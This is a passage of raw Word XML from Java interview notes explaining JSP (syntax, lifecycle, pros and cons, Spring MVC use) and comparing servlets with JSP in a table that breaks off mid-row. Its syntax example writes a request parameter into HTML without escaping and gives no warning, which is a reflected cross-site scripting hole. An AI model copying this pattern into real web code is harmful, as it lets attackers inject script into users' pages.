          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> .jsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5917D6" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1757"/>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Runs on:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Servlet Container (like Apache Tomcat)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F43C3E" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1757"/>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Translated into:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Servlet (yes, internally JSP is converted to a servlet class!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B7E5A6" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1757"/>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Used for:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Displaying dynamic content like user dashboards, tables, forms, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F1E3F3" w14:textId="77777777" w:rsidR="00F363B4"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3498E19">
          <v:rect id="_x0000_i1924" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C2C888" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4"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Basic Syntax Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4893C892" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B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lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68826799" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B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lt;head&gt;&lt;title&gt;JSP Example&lt;/title&gt;&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCD3B43" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B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lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75675BA5" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B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h1&gt;Hello, &lt;%= request.getParameter("name") %&gt;!&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1933AEC6" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B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lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC48FB5" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B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lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CA1249" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1758"/>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lt;%= ... %&gt; is used to output Java expressions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342C33FE" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1758"/>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You can use scriptlets &lt;% ... %&gt;, expressions, or directives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED356F7" w14:textId="77777777" w:rsidR="00F363B4"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7DD3D4E">
          <v:rect id="_x0000_i1925" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBC0458" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4"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JSP Lifecycle (like Servlet):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FF69CD" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="175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Translation:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> JSP → Servlet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388AC267" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="175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Compilation:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Servlet compiled to .class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E50B698" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="175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Loading:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Loaded into memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3979C281" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="175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Execution:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Handles requests using service() method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F27AE2D" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="175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Destroy:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When container shuts down or class is unloaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0051A9A0" w14:textId="77777777" w:rsidR="00F363B4"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D85CC92">
          <v:rect id="_x0000_i1926" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E51838" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4"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Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADF05EC" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176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Easier and faster than writing full Java servlets for simple UI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F2EDFA" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176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Allows mixing static HTML with dynamic Java code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA04EFD" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176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Supports MVC (used in View layer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4302F81B" w14:textId="77777777" w:rsidR="00F363B4"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1060B55">
          <v:rect id="_x0000_i1927" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F5067D" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4"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Disadvantages (Why it’s less used today):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A06CBB7" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1761"/>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lastRenderedPageBreak/>
        <w:t>Mixing Java and HTML can get messy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C21150" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1761"/>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Not ideal for large-scale UI — modern apps prefer </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thymeleaf</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>React</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Angular</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1ED7C6" w14:textId="77777777" w:rsidR="00F363B4"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FED6CF5">
          <v:rect id="_x0000_i1928" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="734872C3" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4"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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D679DA3" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B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In traditional Spring MVC apps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B175C0B" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1762"/>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Controller returns ModelAndView("home")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A32E610" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1762"/>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home.jsp renders the UI using the model data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB0EC5F" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F363B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279CBDE">
          <v:rect id="_x0000_i1929" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="259A13D9" w14:textId="30C97F98" w:rsidR="00502122" w:rsidRPr="00CE4B95" w:rsidRDefault="009E74CB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="391" w:name="_Toc196307871"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the difference between servlet and JSP</w:t>
      </w:r>
      <w:r w:rsidR="00502122" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="391"/>
    </w:p>
    <w:p w14:paraId="588DFE96" w14:textId="40B03FAE" w:rsidR="00176D44" w:rsidRPr="00CE4B95" w:rsidRDefault="00176D44" w:rsidP="00C957D8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A6CAE1C" w14:textId="77777777" w:rsidR="00176D44" w:rsidRPr="001B573F" w:rsidRDefault="00176D44"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Servlet vs JSP (JavaServer Pag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7"/>
        <w:gridCol w:w="4315"/>
        <w:gridCol w:w="4382"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="68149A81" w14:textId="77777777" w:rsidTr="00176D44">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16605E69" w14:textId="77777777" w:rsidR="00176D44" w:rsidRPr="001B573F" w:rsidRDefault="00176D44" w:rsidP="001B573F">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A12ADC0" w14:textId="77777777" w:rsidR="00176D44" w:rsidRPr="001B573F" w:rsidRDefault="00176D44" w:rsidP="001B573F">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Servlet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09A05CCB" w14:textId="77777777" w:rsidR="00176D44" w:rsidRPr="001B573F" w:rsidRDefault="00176D44" w:rsidP="001B573F">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>JSP (JavaServer Pages)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="00EC6662" w14:textId="77777777" w:rsidTr="00176D44">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="797840FE"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Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15625353"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Java class that handles HTTP requests/responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78236526"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HTML page with embedded Java code for dynamic content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="3A66091F" w14:textId="77777777" w:rsidTr="00176D44">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08206F95"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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F656086"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Mainly for </w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>control logic</w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (backend logic)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F34DF44"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Mainly for </w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>presentation logic</w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (UI rendering)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="54EC6739" w14:textId="77777777" w:rsidTr="00176D44">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7778C6CC"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Code Style</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F6F6675"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Pure Java code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FBA9B81"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HTML + Java (scriptlets)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="47FDF7F4" w14:textId="77777777" w:rsidTr="00176D44">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C40DADD"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Extension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F190C01"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java (compiled to .class)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EEE5349"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jsp (translated to .java, then compiled)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="56DE7739" w14:textId="77777777" w:rsidTr="00176D44">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="751E1CC9"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Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F43405C"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Directly compiled as a servlet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7208CE47"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First converted to a servlet, then compiled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="47C500A2" w14:textId="77777777" w:rsidTr="00176D44">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F90A23F"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Best Used For</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AAD0AE0"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Processing logic, interacting with DB, managing sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B8711DC"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Displaying data, form output, UI templates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="224388DE" w14:textId="77777777" w:rsidTr="00176D44">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BB62D47"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Readability</w:t>
            </w:r>
          </w:p>
